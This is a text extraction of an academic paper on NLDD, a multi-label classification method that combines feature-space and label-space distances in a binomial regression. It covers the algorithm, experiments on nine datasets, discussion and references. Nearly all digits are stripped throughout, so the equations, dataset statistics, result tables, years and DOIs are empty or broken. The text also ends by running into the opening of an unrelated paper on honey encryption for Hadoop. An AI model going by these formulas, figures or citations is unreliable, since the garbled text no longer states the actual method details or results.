input: new instance x, binomial model g, probabilistic classifiers h(i), training data t of size n output: multi-label classification vector ŷ for j= to n do compute p̂=(h( )(x),...,h(l)(x)) compute dxj and dyj obtain θ̂j ←g(dxj,dyj ) end for return ŷ←argmin yj∈t θ̂j the regressions dx and dy need to be computed on the training data. for this purpose we split the training data (t) equally into an internal training data set, t , and an internal validation data set, t . we next fit a binary classifier to each of the l labels separately and obtain the labelset predictions (i.e., probability outcomes) for the instances in t . in principle, each observation in t can be paired with each observation in t , creating a (dx,dy) pair, and the regressions can be run on all possible pairs. note that matching any single instance in t to those in t results in n/ distance pairs. however, most of the pairs are uninformative because the distance in either the feature space or the label space is very large. since candidate labelsets for the final prediction will have a small dy and a small gweon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. dx d y mi mi wiy figure an illustration of how to identify mi and mi for n = .t and t contain instances each. the points in the scatter plot were obtained by calculating dx and dy between a single instance in t and the instances in t . in this example two points have the lowest distance in dy and are candidates for mi . among the candidates, the point with the lowest dx is chosen. full-size doi: . /peerjcs. /fig- dx, it is reasonable to focus more on the behavior of the loss especially at small values of dx and dy than considering the loss at the entire range of the distances. moreover, since t contains n/ instances, the number of possible pairs is potentially large (n / ). therefore, to reduce computational complexity, for each instance we only identify two pairs: the pair with the smallest distance in x and the pair with the smallest distance in y. in case of ties in one distance, the pair with the smallest value in the other distance is chosen. more formally, we identify the first pair mi by mi = argmin (dx,dy)∈wix dy where wix is the set of pairs that are tied; i.e., that each corresponds to the minimum distance in dx. similarly, the second pair mi is found by mi = argmin (dx,dy)∈wiy dx. where wiy is the set of labels that are tied with the minimal distance in dy. figure illustrates an example of how to identify mi and mi for n = . our goal was to identify the instance with the smallest distance in x and the instance with the smallest distance in y. note that mi and mi may be the same instance. if we find a single instance that minimizes both distances, we use just that instance. (a possible duplication of that instance is unlikely to make any difference in practice). gweon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. the two pairs corresponding to the ith instance in t are denoted as the set si = { mi ,mi } , and their union for all instances is denoted as s= ⋃n/ i= si. the binomial regression specified in eq. ( ) is performed on the n =n instances in s. algorithm outlines the training procedure. for the classification of a new instance, we first obtain p̂ using the probabilistic classifiers fitted to the training data t . dxj and dyj are obtained by matching the instance with the jth training instance. using the mles β̂ , β̂ and β̂ , we calculate θ̂j = e f̂j +e f̂j where f̂j = β̂ +β̂ dxj +β̂ dyj . the final prediction of the new instance is obtained by ŷ=argmin yj∈t ê(loss)=argmin yj∈t θ̂j. the second equality holds because ê(loss)=lθ̂ and l is a constant. as in lp, nldd chooses a training labelset as the predicted vector. algorithm outlines the classification procedure. the training time of nldd is o(l(f (d,n)+ f (d,n/ )+g(d,n/ ))+n (d+l)+ nlog(k)) where o(f (d,n)) is the complexity of each binary classifier with d features and n training instances, o(g(d,n/ )) is the complexity for predicting each label for t , n (d+l) is the complexity for obtaining the distance pairs for the regression and o(nlog(k)) is the complexity for fitting a binomial regression. t and t have n/ instances respectively. o(lf (d,n/ )) is the complexity for fitting binary classifiers using t and obtaining the probability results for t takes o(lg(d,n/ )). for each instance of t , we obtain n/ numbers of distance pairs. this has complexity o((n/ )(d+l)). since there are n/ instances, overall it takes o((n/ )(n/ )(d+l)) or o(n (d+l)) when omitting the constant. among the n/ pairs for each instance of t , we only identify at most pairs. this implies n/ ≤ s≤n where s is the number of elements in s. each iteration of the newton–raphson method has a complexity of o(n). for k-digit precision complexity o(logk) is required (ypma, ). combined, the complexity for estimating the parameters with k-digit precision is o(nlog(k)). in practice, however, this term is dominated by n (d+l) as we can set k <<n . experimental evaluation in this section we compare different multi-label algorithms on nine data sets. we next introduce the data sets and the evaluation measures and then present the results of our experiments. data sets we evaluated the proposed approach using nine commonly used multi-label data sets from different domains. table shows basic statistics for each data set including its domain, numbers of labels and features. in the text data sets, all features are categorical (i.e., binary). the last column ‘‘lcard’’, short for label cardinality, represents the average number of labels associated with an instance. the data sets are ordered by (|l|·|x|·|e|). the emotions data set (trohidis et al., ) consists of pieces of music with rhythmic and timbre features. each instance is associated with up to emotion labels such as ‘‘sad-lonely’’, gweon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table multi-label data sets and their associated characteristics. label cardinality (lcards) is the aver- age number of labels associated with an instance. name domain labels (|l|) features (|x|) examples (|e|) lcards emotions music . scene image , . yeast biology , . medical text , . slashdot text , , . enron text , , . ohsumed text , , . tmc text , . bibtex text , , . ‘‘amazed-surprised’’ and ‘‘happy-pleased’’. the scene data set (boutell et al., ) consists of images with visual features. each image is associated with up to labels including ‘‘mountain’’, ‘‘urban’’ and ‘‘beach’’. the yeast data set (elisseeff & weston, ) contains , yeast genes in the yeast saccharomyces cerevisiae. each gene is represented by features and is associated with a subset of functional labels. the medical data set consists of documents that describe patient symptom histories. the data were made available in the medical natural language processing challenge in . each document is associated with a set of disease codes. the slashdot data set consists of , text instances with labels obtained from slashdot.org. the enron data set (klimt & yang, ) contains , email messages from the enron corporation employees. the emails were categorized into labels. the ohsumed data set (hersh et al., ) is a collection of medical research articles from medline database. we used the same data set as in (read et al., ) that contains , instances and labels. the tmc data set (srivastava & zane-ulman, ) contains , aviation safety reports associated with up to labels. following tsoumakas, katakis & vlahavas ( ), we used a reduced version of the data set with features. the bibtex data set (katakis, tsoumakas & vlahavas, ) consists of , bibtex entries for automated tag suggestion. the entries were classified into labels. all data sets are available online at: mulan (http://mulan.sourceforge.net/datasets-mlc.html) and meka (http://meka.sourceforge.net/#datasets). evaluation metrics multi-label classifiers can be evaluated with various loss functions. here, four of the most popular criteria are used: hamming loss, / loss, multi-label accuracy and f-measure. these criteria are defined in the following paragraphs. let l be the number of labels in a multi-label problem. for a particular test instance, let y= (y( ),...,y(l)) be the labelset where y(j) = if the jth label is associated with the instance and otherwise. let ŷ= (ŷ( ),...,ŷ(l)) be the predicted values obtained by any machine learning method. hamming loss refers to the percentage of incorrect labels. the gweon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://mulan.sourceforge.net/datasets-mlc.html http://meka.sourceforge.net/#datasets http://dx.doi.org/ . /peerj-cs. hamming loss for the instance is hamming loss= − l l∑ j= {y(j)= ŷ(j)} where is the indicator function. despite its simplicity, the hamming loss may be less discriminative than other metrics. in practice, an instance is usually associated with a small subset of labels. as the elements of the l-dimensional label vector are mostly zero, even the empty set (i.e., zero vector) prediction may lead to a decent hamming loss. the / loss is if all predicted labels match the true labels and otherwise. hence, / loss= − {y= ŷ}. compared to other evaluation metrics, / loss is strict as all the l labels must match to the true ones simultaneously. the multi-label accuracy (godbole & sarawagi, ) (also known as the jaccard index) is defined as the number of labels counted in the intersection of the predicted and true labelsets divided by the number of labels counted in the union of the labelsets. that is, multi-labelaccuracy = |y∩ŷ| |y∪ŷ| . the multi-label accuracy measures the similarity between the true and predicted labelsets. the f-measure is the harmonic mean of precision and recall. the f-measure is defined as f-measure= |y∩ŷ| |y|+|ŷ| . the metrics above were defined for a single instance. on each metric, the overall value for an entire test data set is obtained by averaging out the individual values. experimental setup we compared our proposed method against br, smbr, ecc, rakel, homer, rf-pct , mlknn and cbm. to train multi-label classifiers, the parameters recommended by the authors were used, since they appear to give the best (or comparable to the best) performance in general. in the case of mlknn , we set the number of neighbors and the smoothing parameter to and respectively. for rakel, we set the number of separate models to l and the size of each sub-labelset to . for ecc, the number of cc models for each ensemble was set to . for homer, the number of clusters was set to as used in liu et al. ( ). on the larger data sets (ohsumed, tmc and bibtex), we fit ecc using reduced training data sets ( % of the instances and % of the features) as suggested in read et al. ( ). on the same data sets, we ran nldd using % of the training data to reduce redundancy in learning. for nldd, we used support vector machines (svm) (vapnik, ) as the base classifier on unscaled variables with a linear kernel and tuning parameter c = . the svm scores were converted into probabilities using platt’s method (platt, ). the analysis was conducted in r (r core team, ) using the e package (meyer et al., ) for gweon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table hamming loss (lower is better) averaged over cross validations (with ranks in parentheses). the data sets are ordered as in table . data br smbr nldd ecc rakel homer rf-pct mlknn cbm emotions . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) scene . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) yeast . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) medical . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) slashdot . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) enron . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) ohsumed . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) tmc . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) bibtex . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) av. ranks . . . . . . . . . svm. for the data sets with less than , instances -fold cross validations (cv ) were performed. on the larger data sets, we used / train/test splits. for fitting binomial regression models, we divided the training data sets at random into two parts of equal sizes. for rf-pct , we used the clus (http://clus.sourceforge.net) system. in the pre-pruning strategy of pct , the significance level for the f-test was automatically chosen from { . , . , . , . , . , . } using a reserved prune-set. for cbm, we used the authors’ java program (https://github.com/cheng-li/pyramid). the default settings (e.g., logistic regression and iterations for the em algorithm) were used on non-large data sets. for the large data sets tmc and bibtex, the number of iterations was set to and random feature reduction was applied as suggested by the developers. on each data set we used the train/test split recommended at their website (https://github.com/cheng-li/pyramid). to test the hypothesis that all classifiers perform equally, we used the friedman test as recommended by demšar ( ). we then compared nldd with each of the other methods using wilcoxon signed-rank tests (wilcoxon, ). we adjusted p-values for multiple testing using hochberg’s method (hochberg, ). in nldd, when calculating distances in the feature spaces we used the standardized features so that no particular features dominated distances. for a numerical feature variable x, the standardized variable z is obtained by z =(x− x̄)/sd(x) where x̄ and sd(x) are the mean and standard deviation of x in the training data. results tables to summarize the results in terms of hamming loss, / loss, multi-label accuracy and f-measure, respectively. we also ranked the algorithms for each metric. according to the friedman tests, the classifiers are not all equal (p< . ). the post-hoc analysis - adjusted for multiple testing - showed that nldd performed significantly better than br and smbr on all metrics, significantly better than rakel and mlknn on all but hamming loss, significantly better than homer on hamming loss and / loss, and significantly better than ecc and rf-pct on / loss. no method performed statistically significantly better than nldd on any evaluation metric. gweon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://clus.sourceforge.net https://github.com/cheng-li/pyramid https://github.com/cheng-li/pyramid http://dx.doi.org/ . /peerj-cs. table / loss (lower is better) averaged over cross validations (with ranks in parentheses). the loss is if a predicted labelset matches the true labelset exactly and otherwise. data br smbr nldd ecc rakel homer rf- pct mlknn cbm emotions . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) scene . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) yeast . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) medical . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) slashdot . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) enron . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) ohsumed . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) tmc . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) bibtex . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) av. ranks . . . . . . . . . table multi- label accuracy (higher is better) averaged over cross validations (with ranks in parentheses). data br smbr nldd ecc rakel homer rf- pct mlknn cbm emotions . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) scene . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) yeast . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) medical . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) slashdot . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) enron . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) ohsumed . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) tmc . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) bibtex . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) av. ranks . . . . . . . . . table f-measure (higher is better) averaged over cross validations (with ranks in parentheses). data br smbr nldd ecc rakel homer rf-pct mlknn cbm emotions . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) scene . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) yeast . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) medical . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) slashdot . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) enron . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) ohsumed . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) tmc . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) bibtex . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) av. ranks . . . . . . . . . gweon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table evaluation results on the bibtex data set by whether or not the labelset was observed (subset a) or unobserved (subset b) in the training data. subset a contains % of the test instances and subset b contains %. for hamming loss and / loss, lower is better. for multi-label accuracy and f-measure, higher is better. subset a subset b total (a∪b) br nldd br nldd br nldd hamming loss . . . . . . / loss . . . . . . multi-label accuracy . . . . . . f-measure . . . . . . nldd achieved lowest (i.e., best) average ranks on / loss and multi-label accuracy, while ecc and rf-pct achieved the lowest average ranks on the f-measure and hamming loss, respectively. on both f-measure and hamming loss, nldd achieved the second lowest (i.e., best) average ranks. cbm achieved the second lowest average rank on / loss and multi-label accuracy. the performance of cbm on the / loss was very variable achieving the lowest rank on five out of nine data sets and the second worst on two data sets. we next look at the performance of nldd by whether or not the true labelsets were observed in the training data. a labelset has been observed if the exact labelset can be found in the training data and unobserved otherwise. since nldd makes a prediction by choosing a training labelset, a predicted labelset can only be partially correct on an unobserved labelset. table compares the evaluation results of br and nldd on two separate subsets of the test set of the bibtex data. the bibtex data were chosen because the data set contains by far the largest percentage of unobserved labelsets ( %) among the data sets investigated. the test data set was split into subsets a and b; if the labelset of a test instance was an observed labelset, the instance was assigned to a; otherwise the instance was assigned to b. for all of the four metrics, nldd outperformed br even though % of the labelsets in the test data were unobserved labelsets. we next look at the three regression parameters the proposed method (nldd) estimated (eq. ( )) for each data set in more detail. table displays the mle of the parameters of the binomial model in each data set. in all data sets, the estimates of β and β were all positive. the positive slopes imply that the expected loss (or, equivalently the probability of misclassification for each label) decreases as dx or dy decreases. from the values of β̂ we may infer how low the expected loss is when either dx or dy is . for example, β̂ =− . in the scene data set. if dx = and dy = , p̂= . because log p̂ −p̂ =− . . hence ê(loss)=lp̂= · . = . . this is the expected number of mismatched labels for choosing a training labelset whose distances to the new instance are zero in both feature and label spaces. the results suggest the expected loss would be very small when classifying a new instance that had a duplicate in the training data (dx= ) and whose labels are predicted with probability and the predicted labelset was observed in the training data (dy= ). gweon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table the maximum likelihood estimates of the parameters of equation ( ) averaged over cross validations. data β̂ β̂ β̂ emotions − . . . scene − . . . yeast − . . . medical − . . . slashdot − . . . enron − . . . bibtex − . . . ohsumed − . . . tmc − . . . scaling up nldd as seen in ‘nearest labelset using double distances (nldd)’, the time complexity of nldd is dependent on the size of the training data (n). in particular, the term o(n (d+l)) makes the complexity of nldd quadratic in n . for larger data sets the running time could be reduced by running the algorithm on a fraction of the n instances, but performance may be affected. this is investigated next. figure illustrates the running time and the corresponding performance of nldd as a function of the percentage of n . for the result, we used the tmc data with / train/test splits. after splitting, we randomly chose %– % of the training data and ran nldd with the reduced data. as before, we used svm with a linear kernel as the base classifier. the result shows that nldd can obtain similar predictive performances for considerably less time. the running time increased quadratically as a function of n while the improvement of the performance of nldd appeared to converge. using % of the training data, nldd achieved almost the same performance in the number of mismatched labels as using the full training data. similar results were obtained on other large data sets. discussion for the sample data sets selected, nldd achieved the lowest (i.e., best) average ranks on / loss and multi-label accuracy, and the second lowest average ranks on hamming loss and f-measure compared with other state-of-art methods. what may explain the success of nldd? nldd minimizes a function of two distances. nldd performs substantially better than separate approaches that rely on only one of the distances: k-nearest neighbors (k= ) using dx only or smbr using dy only (supplemental information). nldd integrates the two distances using an additive model eq. ( ). the specific integration does not appear crucial: we have experimented with a multiplicative model, log ( θ −θ ) =β +d β x d β y , that performed similarly (results not shown). therefore the success seems due to the combination of two quite different distances. the distances may be complementary in that dx corresponds to a highly local classifier (knn with k= ) gweon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. a percentage of instance space (n) t im e ( se co n d s) . . . . . b percentage of instance space (n) n u m b e r o f m is cl a ss ifi e d la b e ls figure running time (a) and the average number of mismatched labels (b) as a function of the percentage of the instance space for nldd. full-size doi: . /peerjcs. /fig- and dy draws on a global classifier. computing the distance dy requires estimating the probability of each label using a base classifier. the classifier used here, svm, is a general global classifier. some evidence for the conjecture that a global base classifier is important are experiments using nearest neighbors (knn) instead of svm as a base classifier: a more global choice (k = ) yielded much improved results over a more local choice (k = ) (supplemental information). like br, nldd uses outputs of independent binary classifiers. using the distances in the feature and label spaces in binomial regression, nldd can make more accurate predictions than br. nldd was also significantly superior to smbr, which is similar to nldd in the sense that it makes predictions by choosing training labelsets using binary classifiers. one of the reasons why nldd performs better than br and smbr is that it contains extra parameters. smbr is based on the label space only, while nldd uses the distances in the feature space as well. like lp, the proposed method predicts only labelsets observed in the training data. in restricting the labelsets for prediction, higher order correlations among the labels are implicitly accounted for. at the same time, this restriction is nldd’s main limitation. if a new instance has a true labelset unobserved in the training data, there will be at least one incorrectly predicted label. even so, nldd scored best on two metrics and second best on two other metrics. how frequently an unobserved labelset occurs depends on the data set. for most data sets, less than % of the test data contained labelsets not observed in the training data. in other words, most of the labelsets of the test instances could be found in gweon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. the training data. however, for the bibtex data set about % of the test data contained unobserved labelsets. as seen in table , when the true labelsets of the test instances were not observed in the training data (subset b), br performed slightly better than nldd in terms of / loss, multi-label accuracy and f-measure. on the other hand, when the true labelsets of the test instances were observed in the training data (subset a), nldd outperformed br on all of the metrics. combined, nldd achieved higher performances than br on the entire test data. however, nldd might not fare as well when the percentage of unobserved labelsets is substantially greater. the use of binomial regression (see equation eq. ( )) implies that the misclassification probability θ is constant for each label. although the true misclassification probabilities may differ for labels, the experimental results showed that nldd performs well under this assumption. instead of using binomial regression and estimating a single constant θ, one might have used l logistic regressions to estimate individual θi (i= ,...,l) for each label. rather than choosing the labelset that minimizes a single θ, one could have then chosen the labelset that minimizes a function of the θi. however, choosing such a function is not straightforward. also, this requires estimating l parameters instead of . nldd uses binomial regression to estimate the parameters. this setup assumes that the instances in s are independent. while it turned out that this assumption worked well in practice, dependencies may arise between the two pairs of a given si. if required this dependency could be modeled using, for example, generalized estimating equations (gee) (liang & zeger, ). we examined gee using an exchangeable correlation structure. the estimates were almost the same and the prediction results were unchanged. the analogous results are not shown. nldd has higher time complexity than br. the relative differences of running time between nldd and br depended on the size of the training data (n). the number of labels and features had less impact on the differences, as the complexity of nldd is linear in them. for prediction, the minimization in eq. ( ) only requires the estimates of the coefficients β andβ which determine the tradeoff between dx and dy. the estimate ofβ is not needed. however, estimating β allows us to also estimate the probability of a misclassification of a label for an instance, θ̂. such an assessment of uncertainty of the prediction can be useful. for example, one might only want to classify instances where the probability of misclassification is below a certain threshold value. nldd uses a linear model for binomial regression specified in eq. ( ). to investigate how the performance of nldd changes in nonlinear models, we also considered a model: log ( θ −θ ) =β +d β x ·d β y in which the distances are combined in a multiplicative way. the difference of prediction results obtained by the linear and multiplicative models was small. while we used the euclidean distance for nldd, other distance metrics such as the manhattan distance may also be employed. we ran nldd based on the manhattan distance in the label space and the results were almost the same: over % of the prediction were identical and the differences of the performance in all metrics were less than %(the euclidean distance gave slightly better performance for most data). this shows that the gweon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. difference in prediction performance between the manhattan and the euclidean metrics was tiny in practice. while svm was employed as the base classifier, other algorithms could be chosen provided the classifier can estimate posterior probabilities rather than just scores. better predictions of binary classifiers will make distances in the label space more useful and hence lead to a better performance. lastly, we observed that the distributions of labels are, in general, unbalanced for many multi-label datasets. since the performance of traditional classification algorithms can be limited on unbalanced data, addressing this problem could improve the reliability of the probabilistic classifiers, and result in an improved performance of nldd. to mitigate the unbalanced distributions of labels, we applied synthetic minority over-sampling technique (smote) (chawla et al., ) that evens out the class distribution by generating synthetic examples of the minority class. probabilistic classifiers were then trained on the expanded training data and used in the process of nldd. for out of the data sets, the / loss, multi-label accuracy and f-measure were improved by a modest amount. conclusion in this article, we have presented nldd based on probabilistic binary classifiers. the proposed method chooses a training labelset with the minimum expected loss, where the expected loss is a function of two variables: the distances in feature and label spaces. the parameters are estimated by maximum likelihood. the experimental study with nine different multi-label data sets showed that nldd outperformed other state-of-the-art methods on average in terms of / loss and multi-label accuracy. additional information and declarations funding this research was supported by national science and engineering research council of canada and by social sciences and humanities research council of canada (sshrc # - - ). there was no additional external funding received for this study. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: national science and engineering research council of canada. social sciences and humanities research council of canada: sshrc # - - . competing interests the authors declare there are no competing interests. author contributions • hyukjun gweon conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or gweon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • matthias schonlau conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft. • stefan h. steiner conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: raw data is available at github: https://github.com/hgweon/hg-multilabel. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references blockeel h, raedt l, ramon j. . top-down induction of clustering trees. in: proceedings of the th international conference on machine learning. – . boutell mr, luo j, shen x, brown cm. . learning multi-label scene classification. pattern recognition ( ): – doi . /j.patcog. . . . chawla nv, bowyer kw, hall lo, kegelmeyer wp. . smote: synthetic minority over-sampling technique. journal of artificial intelligence research ( ): – doi . /jair. . demšar j. . statistical comparisons of classifiers over multiple data sets. journal of machine learning research : – . elisseeff a, weston j. . a kernel method for multi-labelled classification. in: ad- vances in neural information processing systems . cambridge: mit press, – . godbole s, sarawagi s. . discriminative methods for multi-labeled classification. in: dai h, srikant r, zhang c, eds. advances in knowledge discovery and data mining. berlin, heidelberg: springer, – doi . / - - - - _ . gonçalves t, quaresma p. . a preliminary approach to the multilabel classification problem of portuguese juridical documents. in: proceedings of the th portuguese conference on artificial intelligence. springer, – doi . / - - - - _ . hersh w, buckley c, leone tj, hickam d. . ohsumed: an interactive retrieval evaluation and new large test collection for research. in: proceedings of the th an- nual international acm-sigir conference on research and development in information retrieval. london, – doi . / - - - - _ . hochberg y. . a sharper bonferroni procedure for multiple tests of significance. biometrika ( ): – . gweon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/hgweon/hg-multilabel http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /j.patcog. . . http://dx.doi.org/ . /jair. http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /peerj-cs. ji s, tang l, yu s, ye j. . extracting shared subspace for multi-label classification. in: proceedings of the th acm sigkdd international conference on knowledge discovery and data mining. acm, – doi . / . . katakis i, tsoumakas g, vlahavas i. . multilabel text classification for automated tag suggestion. in: proceedings of the ecml/pkdd discovery challenge. antwerp. klimt b, yang y. . the enron corpus: a new dataset for email classification research. in: proceedings of the th european conference on machine learning. pisa: springer, – doi . / - - - - _ . kocev d, vens c, struyf j, džeroski s. . ensembles of multi-objective decision trees. in: proceedings of the th european conference on machine learning. – . li c, wang b, pavlu v, aslam ja. . conditional bernoulli mixtures for multi-label classification. in: proceedings of the rd international conference on machine learning. new york, – . li t, ogihara m. . detecting emotion in music. in: proceedings of the international symposium on music information retrieval. – . liang k-y, zeger sl. . longitudinal data analysis using generalized linear models. biometrika ( ): – . liu f, zhang x, ye y, zhao y, li y. . mlrf: multi-label classification through random forest with label-set partition. in: proceedings of the th international conference on intelligent computing. springer, – . madjarov g, kocev d, gjorgjevikj d, džeroski s. . an extensive experimental com- parison of methods for multi-label learning. pattern recognition ( ): – doi . /j.patcog. . . . meyer d, dimitriadou e, hornik k, weingessel a, leisch f. . e : misc functions of the department of statistics, tu wien. available at http://cran.r-project.org/ package=e . platt j. . probabilistic outputs for support vector machines and comparisons to regularized likelihood methods. in: smola a, bartlett p, schoelkopf b, schuurmans d, eds. advances in large margin classifiers. cambridge: mit press, – . r core team. . r: a language and environment for statistical computing. vienna: r foundation for statistical computing. available at http://www.r-project.org/ . read j, pfahringer b, holmes g. . multi-label classification using ensembles of pruned sets. in: proceedings of the th ieee international conference on data mining. – doi . /icdm. . . read j, pfahringer b, holmes g, frank e. . classifier chains for multi-label classification. machine learning ( ): – doi . /s - - - . schapire re, singer y. . improved boosting algorithms using confidence-rated predictions. machine learning ( ): – doi . /a: . schapire re, singer y. . boostexter: a boosting-based system for text categorization. machine learning ( ): – doi . /a: . srivastava a, zane-ulman b. . discovering recurring anomalies in text reports regarding complex space systems. in: proceedings of the ieee aerospace conference. – doi . /aero. . . gweon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /j.patcog. . . http://cran.r-project.org/package=e http://cran.r-project.org/package=e http://www.r-project.org/ http://dx.doi.org/ . /icdm. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /a: http://dx.doi.org/ . /a: http://dx.doi.org/ . /aero. . http://dx.doi.org/ . /peerj-cs. tai f, lin h-t. . multilabel classification with principal label space transformation. neural computation ( ): – doi . /neco_a_ . trohidis k, tsoumakas g, kalliris g, vlahavas i. . multilabel classification of music into emotions. in: proceedings of the th international conference on music information retrieval. philadelphia, – . tsoumakas g, katakis i. . multi-label classification: an overview. international journal of data warehousing and mining : – . tsoumakas g, katakis i, vlahavas i. . effective and efficient multilabel classification in domains with large number of labels. in: proceedings of ecml/pkdd workshop on mining multidimensional data. – . tsoumakas g, katakis i, vlahavas i. . mining multi-label data. in: maimon o, rokach l, eds. data mining and knowledge discovery handbook. boston: springer, – . tsoumakas g, katakis i, vlahavas i. . random k-labelsets for multilabel classi- fication. ieee transactions on knowledge and data engineering ( ): – doi . /tkde. . . tsoumakas g, vlahavas i. . random k-labelsets: an ensemble method for multilabel classification. in: proceedings of the th european conference on machine learning. berlin: springer, – doi . / - - - - _ . vapnik vn. . the nature of statistical learning theory. nd edition. new york: springer. wilcoxon f. . individual comparisons by ranking methods. biometrics bulletin ( ): – doi . / . ypma tj. . historical development of the newton-raphson method. siam review ( ): – doi . / . zhang m-l, zhou z-h. . a k-nearest neighbor based algorithm for multi-label classification. in: proceedings of the st ieee international conference on granular computing, vol. . – doi . /grc. . . zhang m-l, zhou z-h. . ml-knn: a lazy learning approach to multi-label learning. pattern recognition ( ): – doi . /j.patcog. . . . zhang ml, zhou zh. . a review on multi-label learning algorithms. ieee transac- tions on knowledge and data engineering ( ): – doi . /tkde. . . gweon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /neco_a_ http://dx.doi.org/ . /tkde. . http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / http://dx.doi.org/ . / http://dx.doi.org/ . /grc. . http://dx.doi.org/ . /j.patcog. . . http://dx.doi.org/ . /tkde. . http://dx.doi.org/ . /peerj-cs. submitted may accepted january published february corresponding authors gayatri kapil, gayatri @gmail.com rajeev kumar, rs @gmail.com academic editor shlomi dolev additional information and declarations can be found on page doi . /peerj-cs. copyright kapil et al. distributed under creative commons cc-by . open access attribute based honey encryption algorithm for securing big data: hadoop distributed file system perspective gayatri kapil , alka agrawal , abdulaziz attaallah , abdullah algarni , rajeev kumar and raees ahmad khan information technology, babasaheb bhimrao ambedkar university, lucknow, uttar pradesh, india faculty of computing and information technology, king abdulaziz university, jeddah, saudi arabia abstract hadoop has become a 